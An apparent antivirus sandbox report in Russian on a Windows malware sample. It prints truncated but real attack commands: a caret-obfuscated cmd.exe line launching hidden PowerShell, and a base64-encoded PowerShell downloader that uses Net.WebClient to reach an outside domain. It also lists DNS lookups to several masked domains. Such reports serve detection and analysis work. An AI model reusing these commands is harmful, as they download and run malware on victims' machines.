Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V/C"S^e^T^ ^ ^ Qy^i^6^=^p^o^w^er^%he^l^l^ -e^ ^J^#^B^[^#/^E^#^e^g^#^9^#^G4#ZQ^B^5^#C?^#.w^B^i#^G^o^#ZQ^Bj#^HQ^#I#BO#^G^U#^d#^#:#/c^#Z^QB^i#EM#^.#^Bp#G^U#^.g^B^?#^`^%^#^J^#^Br^#E8#Z^#^#^9#Cc^#^...
Сетевая активность
UDP
- DNS ASK te###.#eterwooding.com
- DNS ASK ne#.##larious.be
- DNS ASK ma#####garcia.com.br
- DNS ASK mu###.rupok.net
- DNS ASK za####sipra.blog
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"S^e^T^ ^ ^ Qy^i^6^=^p^o^w^er^%he^l^l^ -e^ ^J^#^B^[^#/^E^#^e^g^#^9^#^G4#ZQ^B^5^#C?^#.w^B^i#^G^o^#ZQ^Bj#^HQ^#I#BO#^G^U#^d#^#:#/c^#Z^QB^i#EM#^.#^Bp#G^U#^.g^B^?#^`^%^#^J^#^Br^#E8#Z^#^#^9#Cc^#^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAFEAegA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABrAE8AZAA9ACcAaAB0AHQAcAA6AC8ALwB0AGUAcwB0ADUALgBwAGUAdABlAHIAdwBvAG8AZABpAG4AZwAuAGMAbwBtAC8ASgBzAE4AMQBZAH...
